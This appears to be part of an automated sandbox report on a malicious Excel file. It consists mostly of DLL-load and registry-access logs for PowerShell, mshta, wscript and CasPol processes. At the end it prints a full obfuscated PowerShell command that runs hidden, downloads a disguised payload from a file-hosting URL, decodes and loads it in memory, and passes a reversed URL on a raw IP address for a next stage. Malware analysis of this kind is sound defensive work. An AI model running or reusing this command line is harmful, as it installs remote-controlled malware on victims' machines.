                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdbhP source: powershell.exe, 00000012.00000002.486539543.000000000284C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdb source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdb source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdbhP source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: OC25-11-24.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
